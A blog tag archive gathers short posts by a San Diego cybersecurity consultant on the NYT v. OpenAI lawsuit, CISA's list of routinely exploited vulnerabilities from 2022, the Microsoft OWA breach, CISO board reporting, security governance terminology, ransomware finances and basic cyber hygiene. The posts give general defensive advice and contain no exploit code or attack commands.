Paul Bergman

Tag: Tech

  • Will the courts (finally) step in on AI?

    Will the courts (finally) step in on AI?

    The New York Times vs. OpenAI and Microsoft

    In a groundbreaking legal confrontation, the New York Times has recently filed a copyright infringement lawsuit against OpenAI, the creators of ChatGPT, and Microsoft, a partial owner of OpenAI. This lawsuit delves into the complex and arguably unprecedented issues of copyright law in the age of artificial intelligence. As technology rapidly evolves, so too does the landscape of legal challenges. In his latest post, my friend David Lizerbram explores the intricate details of this case, examining the implications of AI’s use of copyrighted materials without permission and the potential defenses available. Join him as he navigates through the legal intricacies and the broader implications for copyright law in the digital age at New York Times v. OpenAI and Microsoft Copyright Case – David Lizerbram & Associates (lizerbramlaw.com)

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • 2022 Top Routinely Exploited Vulnerabilities

    Hello, fellow tech enthusiasts and cybersecurity-conscious readers! In the ever-evolving landscape of cybersecurity, staying ahead of potential threats is essential. Every year, new vulnerabilities are discovered, and cybercriminals work tirelessly to exploit them. In 2022, some vulnerabilities took center stage as they were routinely targeted by malicious actors. As we embark on a journey into the fascinating world of cybersecurity, we’ll explore the top routinely exploited vulnerabilities that dominated headlines in 2022. So, grab your favorite beverage, get comfy, and let’s dive into the captivating world of cybersecurity!

    1. Log4Shell (CVE-2021-44228)

    Kicking off our list is the notorious Log4Shell vulnerability. While it first came to light at the end of 2021, its impact rippled into 2022. It affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. This request will allow the attackers to gain control over applications. Thanks to the cybersecurity community’s swift response, patches were released, but it serves as a reminder of the importance of regular updates and monitoring. 

    2. CVE- 2018-13379 

    This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2022 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.

    3. ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

    These vulnerabilities known as ProxyShell, affect Microsoft Exchange email servers. ProxyShell was another major vulnerability that made headlines in 2022. It consisted of three separate vulnerabilities in Microsoft Exchange Server, enabling attackers to gain unauthorized access to email servers. Regularly applying security updates from Microsoft is essential to protect your organization from ProxyShell attacks.

    4. CVE-2021-40539

    This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

    5. CVE-2021-26084

    It is an object-graph navigation language (OGNL) injection vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a Confluence Server or Data Center instance.

    6. CVE-2022-22954, CVE-2022-22960

    These vulnerabilities are RCE, privilege escalation, and authentication bypass vulnerabilities in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

    7. CVE-2022-1388

    This is a vulnerability in F5 BIG-IP that could allow unauthenticated threat actors to execute arbitrary system commands, create or delete files, or disable services.

    8. CVE-2022-30190

    This is a remote code execution vulnerability affecting Microsoft Windows Support Diagnostic Tool (MSDT) that could allow a remote, unauthenticated threat actor to take control of the system.

    9. CVE-2022-26134

    This is a remote code execution vulnerability in Atlassian Confluence Data Center and Server. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

    Additional “popular” vulnerabilities

    Among the other often exploited vulnerabilities listed, there are bugs in solutions by Citrix (CVE-2019-19781), Microsoft (CVE-2017-0199), CVE-2017-11882, CVE-2020-1472, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2022-41082, Ivanti (CVE-2019-11510), SonicWALL (CVE-2021-20021, CVE-2021-20038), Fortinet (CVE-2022-42475, CVE-2022-40684), QNAP (CVE-2022-27593), and other software manufacturers.

    Some of the vulnerabilities in these lists date back to 2017 and 2018 and are still being widely exploited.

    Staying informed about the top routinely exploited vulnerabilities is a fundamental aspect of cybersecurity. By understanding these threats and taking proactive measures, you can protect your systems and data from malicious actors. 

    REMEMBER TO:

    • Keep all software and libraries up to date.
    • Turn on Multi Factor Authentication or Two Factor Authentication.
    • Regularly monitor your systems for suspicious activity.
    • Develop an incident response plan to mitigate potential threats.
    • Use strong passwords and VPN
    • Invest in cybersecurity software
    • Think before you click on links that look a little off.
    • Be aware of common attack methods.

    Cybersecurity is an ongoing process, and by staying vigilant and informed, you can reduce the risk of falling victim to the latest vulnerabilities and attacks in 2022 and beyond. Let’s take this knowledge and use it to build a safer digital world for all of us. Cheers to a more secure and resilient cyber landscape in 2023 and beyond! Stay secure, stay informed!

    References:

    2022 Top Routinely Exploited Vulnerabilities | CISA

    CISA, NSA, FBI, and International Partners Release Joint CSA on Top Routinely Exploited Vulnerabilities of 2022  | CISA

    AA23-215A: 2022’s Top Routinely Exploited Vulnerabilities – Blog | Tenable®

    How to Protect Yourself from Software Vulnerabilities – Blog | Tenable®

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • Microsoft OWA breach

    Today, we’re diving into a topic that has been making headlines recently. It’s all about the Microsoft Outlook Web App (OWA) breach. I understand that hearing about data breaches can be unsettling, but it’s essential to stay informed and take proactive steps to protect yourself and your information. In this blog post, we’ll break down the Microsoft OWA breach, we’ll talk about what happened, what you can do to protect yourself, and why staying informed is crucial in the digital age. Let’s dive in!

    Understanding The Microsoft OWA breach

    So, what exactly happened? Microsoft’s Outlook Web App (OWA) suffered a security breach that had many users concerned about the safety of their emails, attachments, and personal information. The breach occurred due to a vulnerability that allowed  unauthorized access to OWA accounts. And then recently, Microsoft finally explains the cause of the Azure breach. It stated that the corporate account of one of its engineers was hacked by a highly skilled threat actor that acquired a signing key used to hack dozens Azure and Exchange accounts belonging to high-profile users. 

    It’s important to note that not every OWA user was affected, but it’s still crucial to take precautions. Microsoft acted swiftly to address the breach and initiated an investigation. They also took measures to secure the affected OWA servers and notified customers whose data may have been compromised. In addition, they recommended that users change their passwords as a precaution.

    How to Protect Yourself

    1. Change Your Password – If you are using OWA or any other Microsoft services, change your password immediately. Make sure that your password is strong and unique that includes a combination of letters, numbers, and special characters. 
    2. Timely Action – Microsoft acted swiftly to patch the vulnerability and address the breach. If you’re using OWA, make sure that your software is updated to the latest version to ensure that you’re protected. 
    3. Enable Multi-Factor Authentication (MFA) – If you haven’t already, enable MFA to your OWA account. This can add an extra layer of security by requiring you to verify your identity through a second method, like a code sent to your phone.
    4. Beware of Phishing Attempts – Stay vigilant against phishing emails or suspicious messages. Cybercriminals often take advantage of these situations to trick users into revealing sensitive information. 
    5. Monitor Your Accounts – Regularly check your email and financial accounts for any unusual activities. If you notice something suspicious, report it immediately.
    6. Stay Informed – And last but not the least, keep up to date with news and updates from Microsoft regarding the breach. They may release additional information or security recommendations. 

    The Microsoft OWA breach may have raised some concerns, but always remember that being aware and taking proactive measures are your best allies in the digital world. By keeping your software updated, using strong passwords, enabling MFA, and staying vigilant, you can reduce the risks associated with such incidents. 

    Don’t let this breach discourage you from using technology – it’s an integral part of our lives.

    Instead, let it serve as a reminder to be proactive and informed about cybersecurity. Together, we can make the digital world a safer place for everyone. Stay safe, stay informed, and keep your digital world secure!

    References:

    https://arstechnica.com/security/2023/09/hack-of-a-microsoft-corporate-account-led-to-azure-breach-by-chinese-hackers/

    Outlook Hack: Microsoft Reveals How a Crash Dump Led to a Major Security Breach (thehackernews.com)

    iTWire – Microsoft says Azure breach ‘probably’ due to account being cracked

    How To Prevent A Data Breach In Your Company (forbes.com)

    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • How a CISO needs to present to the board

    How a CISO needs to present to the board

    As a Chief Information Security Officer (CISO), reporting to the corporate board can be both an opportunity and a challenge. On one hand, it’s an opportunity to educate the board on the current state of the company’s security posture, demonstrate the value of security investments, and gain support for future initiatives. On the other hand, it’s a challenge because the board may not be well-versed in technical security concepts, making it difficult to communicate effectively.

    Paul Bergman, CISO
    Chief Information Security Officer

    In order to successfully report to the corporate board, a CISO must approach the task with a clear understanding of the board’s expectations and a well-crafted communication strategy. Here are a few key steps to help you do just that:

    Understand the board’s priorities

    Understand the board’s priorities: Before you present to the board, take the time to understand their priorities and what they are most concerned about. This will help you tailor your presentation to their specific needs and ensure that the information you provide is relevant and valuable.

    Use clear, concise language

    The board is likely to include individuals who are not technically savvy, so it’s important to use clear, concise language that is easy for everyone to understand. Avoid using technical jargon or acronyms, and instead focus on the key security issues that are most relevant to the company’s operations and reputation.

    Emphasize the impact of security risks

    The board needs to understand the impact of security risks on the company’s bottom line. Highlight the potential financial and reputational damage that can result from a security breach, and make sure to demonstrate the value of investments in security technologies and processes.

    Paul Bergman, board member

    Provide regular, comprehensive updates

    The board should receive regular, comprehensive updates on the state of the company’s security posture. These updates should include information on the most significant security risks facing the company, as well as the measures that have been taken to mitigate those risks.

    Encourage open communication

    Encourage open communication with the board, and be prepared to answer any questions they may have. This will help to build trust and ensure that everyone is on the same page when it comes to security issues.

    Be proactive

    A good CISO is always looking ahead to identify potential security risks and developing strategies to mitigate them. Share your vision for the future with the board, and outline the steps that you are taking to stay ahead of the curve.

    In conclusion, reporting to the corporate board as a CISO is an important responsibility, and requires a well-thought-out communication strategy. By understanding the board’s priorities, using clear language, emphasizing the impact of security risks, providing regular updates, encouraging open communication, and being proactive, you can build a strong relationship with the board and help ensure the success of your company’s security efforts.

  • Are you 100% certain that you are on top of security basics?

    Are you 100% certain that you are on top of security basics?

    At the siberX CISO Forum Canada, C. Kelley Bissel, CVP of Microsoft Security reported that CISOs are failing to do the basics. He puts a fair amount of blame for these failures on the company CISO.

    “Ninety-eight per cent of attacks are elementary and take advantage of unpatched devices, a lack of multifactor authentication to protect logins, no privileged access controls, no identity management, and password vulnerabilities.”

    C. Kelley Bissel, CVP, Microsoft Security

    First, it’s not all on the CISO

    A strong argument could be made that a CISO in a non-security centric organization is set up to fail. A CISOs job is difficult even with the full backing of leadership. Consider implementing MFA alone: Many executives will push back on the implementation because it isn’t easy.

    Another point of pushback is access control. I first felt this pushback when I was implementing SOX controls and logging on physical access to the company servers on the CIO. The CIO was extremely bothered having to log his access and tried to kill the process as being inefficient. The fact is, he didn’t need access 99.96% of the time anyway. He nearly killed the process which would have led to a possible security exception in an audit. Not a failure of the CISO but a failure of the organization to allow the necessary security.

    So what are ‘security basics’?

    Mr. Bissel outlines the basics as patching, login protection, access control, identity management, and password strength. Certainly, he was simplifying it for presentation but CIS offers a more comprehensive list that includes 56 “Basics” from 18 different controls in Version 8 of the CIS Critical Security Controls.

    security basics

    See other blog posts for more information on putting in basic cybersecurity.

    Consider looking into vCISO service providers. Tracc Development (site sponsor) or any number of service organizations would be happy to help. Omni Group Consulting and Triden Group have excellent talent.

  • Compliance on the horizon? Understand your terms now!

    Compliance on the horizon? Understand your terms now!

    I recently worked on a compliance readiness project to get a company ready for an ISO 27002 audit. I was amazed at how little the organization understood about governance. They were having problems with other compliance as well, even though they were a SOX compliance entity. Yes, they had pretty written “policies” but these were clearly designed by the marketing team, had no structure, and included standards, guidelines, procedures, and even documented the people assigned to do it all.

    ISACA defines internal controls as the policies, procedures, practices and organizational structures designed to provide reasonable assurance that business objectives will be achieved and undesired events will be prevented or detected and corrected.

    ISACA COBIT 5 Framework

    Doing it wrong is even worse than not doing it at all!

    Poorly-scoped documentation often results in governance functions becoming more of a hindrance than a help. An example of inadequate governance documentation is a multi-page policy document that mixes high-level security concepts, configuration requirements, and work assignments. This type of documentation can cause confusion and inefficiencies across technology, cybersecurity, and privacy operations. There are several reasons why this type of documentation is bad, including the fact that it is confusing and people are unlikely to read it, which defeats the purpose of having it in the first place. Additionally, excessively-wordy documentation that explains concepts in great detail can make it difficult to understand exact requirements. If compliance (or certification) is a goal this can lead to gaps, which goes against the goal of being audit-ready.

    Start with the goal in mind

    First, start of with the requirements. If the goal is a certification or compliance, your governance should align to the requirements. If you are already compliant with a framework, find a crosswalk, or mapping, from your framework into the desired framework. This can help focus your efforts and help build a plan for what needs to be done.

    For many technologists, words matter. Terms like “policies” and “procedures” are often used interchangeably but they are not. These terms have quite different implications and those differences should be kept in mind, since the use of improper terminology has cascading effects.

    Also keep in mind that an audit will confirm that policies are being enforced. This means that if a policy says “Bob will update the SSL keys”, what happens if Bob retires? The policy will need to be rewritten! That’s undue work AND it is very likely that it will be forgotten. Another common mistake is to be too specific with tools, such as stating “All servers are to be running Windows Server 2008.” Obviously these policies will not age well. While all policies should be reviewed regularly, little mistakes like these can be overlooked.

    Source: http://www.commoncontrolsframework.com/

    Doing it right

    In the realm of cybersecurity documentation, a strong governance structure is built on a hierarchy of components that work together in an integrated approach to managing requirements. Keep these components distinct and don’t try to address everything in one document! These components include:

    Policy: A high-level statement of management intent that formally establishes requirements to guide decisions and achieve rational outcomes. Policies are enforced by standards and further implemented by procedures, and are often created in response to external influences like statutory, regulatory, or contractual obligations.

    Control Objectives: Targets or desired conditions that are designed to ensure policy intent is met. Control objectives help to establish the necessary scope to address a policy and should be directly linked to an industry-recognized practice, such as statutory, regulatory, or contractual requirements.

    Standard: Formally-established requirements related to processes, actions, and configurations that are finite and quantifiable. Standards satisfy control objectives and exceptions are never made to policies, only to standards. If a standard cannot be met, a compensating control should be implemented to mitigate risk.

    Guidelines: Recommended practices that allow for discretion or leeway in interpretation, implementation, or use. Guidelines are based on industry-recognized practices or cultural norms within an organization and augment standards when discretion is permissible.

    Procedure: A formal method of doing something based on a series of actions conducted in a certain order or manner. Procedures are the responsibility of the asset custodian to build and maintain, in support of standards and policies.

    Together, these components create a comprehensive and effective governance structure for managing cybersecurity requirements.

    For more information on governance and cyber security, check out other articles here.

  • What happens to ransomware money?

    What happens to ransomware money?

    Ransomware is a type of malicious software that encrypts a victim’s files. The attackers then demand payment in exchange for the decryption key, typically in the form of cryptocurrency, like Bitcoin, because it is easier to make the exchange anonymous. In recent years, ransomware attacks have become an increasingly common form of cybercrime, and the attackers behind them have been able to generate significant amounts of money. But what happens to all of that ransom money? Where does it go and how is it used?

    The vast majority of ransomware payments make their way to Eastern Europe and the former Soviet Union. These regions have become hub for cybercrime due to the high level of technical expertise and the relative ease with which criminal operations can be conducted.  This begs the question about how closely these criminal organizations are to nation states. While Western governments are careful about blaming other nations for such attacks, it is clear that interests are aligned. Western states have noticed an increase in cybercrime activities against them for their support of Ukraine over the last year, clearly an indication of a link in ideologies at the least.  It should be noted that North Korea is also even more clearly in the cybercrime game and uses funds from ransomware payments to directly finance the regime.

    Once the ransom money has been converted into more liquid forms (local currency), it can be used for a variety of purposes. Some of the ransom money is used to fund the attacker’s lifestyle, including expensive cars, luxury vacations, and high-end real estate. Other money is invested in other criminal operations or laundered through various financial institutions to make it appear as legitimate income.

    While Hollywood likes to portray “hackers” as reserved types in hoodies sitting alone in a dark room, ransomware attacks are often carried out by organized crime syndicates. These organizations are extremely well connected and organized as well as any Fortune 500 company. As with any corporation, part of revenue goes back into product development funding development and distribution of new malware, the creation of botnets, and the purchase of stolen data on the dark web. This money can also be used to bribe law enforcement or government officials, allowing the attackers to operate with impunity.

    Mr. Robot

    The flow of ransomware money is complex and multifaceted, and it is difficult to determine exactly where it all goes. Some of it is used to fund the attackers’ lifestyles, while some is invested into developing new and more complex attacks.  Some attacks may directly or indirectly prop up nations.

    If hit with ransomware, each company and individual must evaluate the cost rebuilding their systems and data against paying the ransom. However, that is a simplistic view of the equation. With the rise of corporate social responsibility, paying a ransom to restore services must consider what the ransom proceeds may support.

  • Why boards need to be paying attention to cybersecurity now

    Why boards need to be paying attention to cybersecurity now

    Contrary to popular belief, cybersecurity is not an operations issue! Cybersecurity is frightening and board love to disassociate by saying it is “operational” and thus not their responsibility. However, it is a critical issue for the whole organization and the legal requirements for corporate boards to pay attention to this issue are growing. With increasing numbers of data breaches and cyber-attacks, the legal landscape is rapidly evolving to protect both organizations and their customers from the consequences of these events. Here are a few key legal requirements that corporate boards should be aware of when it comes to cybersecurity:

    • Data protection laws: Many countries have enacted data protection laws, such as the European Union’s General Data Protection Regulation (GDPR), that require organizations to take appropriate measures to protect the personal data of their customers and employees. This includes implementing technical and organizational measures to prevent unauthorized access to personal data, and ensuring that the company has a process in place for responding to data breaches.
    • Cybersecurity regulations: Some industries, such as finance and healthcare, have specific cybersecurity regulations that companies must abide by. These regulations can include requirements for regular risk assessments, incident response plans, and the implementation of security technologies.
    • Contractual obligations: Companies often have contractual obligations to their customers and partners to protect the data they are entrusted with. Failing to meet these obligations can result in financial and reputational damage, and may even lead to legal liability.
    • Corporate governance laws: In many countries, corporate boards have a fiduciary duty to ensure that the company is managed in the best interests of its shareholders. This includes taking steps to protect the company’s assets and data from cyber threats.
    • Tort law: Companies can also face legal liability under tort law if they fail to take reasonable steps to protect their customers’ data. This can include negligence, breach of contract, and misrepresentation claims.

    Corporate boards must be aware of the growing legal requirements around cybersecurity. Failure to meet these requirements can result in legal liability, financial losses, and reputational damage. By staying informed about the latest laws and regulations, conducting regular risk assessments, and implementing appropriate security measures, corporate boards can help ensure that their organizations are protected from cyber threats and meet their legal obligations. I outlined a number or items a board should be doing in my post on corporate boards: The role of the corporate board in cybersecurity – Paul Bergman

  • FBI app helps get missing child info out

    FBI app helps get missing child info out

    If you are like me, this is something you really don’t want to think about. I would imagine that a missing child is the most terrifying thing possible for a parent. As I sit down to write this, I wonder if this is even something I want to bring up. But being prepared, even for the unthinkable, is important.

    The FBI has an app that allows you to store photos and vital information about your children.

    The Child ID app—the first mobile application created by the FBI—provides a convenient place to electronically store photos and vital information about your children on your smartphone (note: no information is stored or collected by the FBI). In the event your child goes missing, users can show the pictures and provide physical identifiers such as height and weight to security or police officers on the spot. Using a special tab on the app, users can also quickly and easily e-mail the information to authorities.

    The app also includes tips on keeping children safe, as well as specific guidance on what to do in those first few crucial hours after a child goes missing.

    An important note from the FBI site: The FBI is not collecting or storing any photos or information that you enter in the app. All data resides solely on your mobile device unless you need to send it to authorities. Please read your mobile provider’s terms of service for information about the security of applications stored on your device.

  • What is Cybersecurity?

    What is Cybersecurity?

    Cybersecurity is the practice of protecting internet-connected systems, including hardware, software, and data, from attack, damage, or unauthorized access. In today’s digital age, cybersecurity is more important than ever, as more and more of our personal and professional lives take place online.

    One of the most common forms of cyber attack is the hacking of personal and business websites. Hackers use a variety of methods to gain access to these sites, including exploiting vulnerabilities in the site’s code, phishing scams, and social engineering. Once they have access, they can steal sensitive information such as login credentials, financial data, and personal information.

    Cybersecurity image

    Another common form of cyber-attack is the spread of malware, which is short for “malicious software.” Malware is any software that is designed to harm a computer system. This can include viruses, trojans, and spyware, which can cause damage or steal information from the infected system.

    To protect against cyber attacks, individuals and businesses should take steps to secure their online presence. This includes using strong passwords and two-factor authentication (see my article on DUO), keeping software and operating systems up to date, and being cautious when opening email attachments or clicking on links.

    Businesses should also have a cybersecurity plan in place, which should include regular security assessments, employee training on how to identify and prevent cyber attacks, and incident response plans in case of a security breach.

    There are also a number of cybersecurity technologies and services available to help protect against cyber-attacks. These include firewalls, antivirus software, intrusion detection and prevention systems, and virtual private networks (VPNs).

    Overall, cybersecurity is a vital aspect of the modern world, and it is important for individuals and businesses to take the necessary steps to protect themselves from cyber-attacks. By staying informed and taking proactive measures, we can help to keep our online lives safe and secure.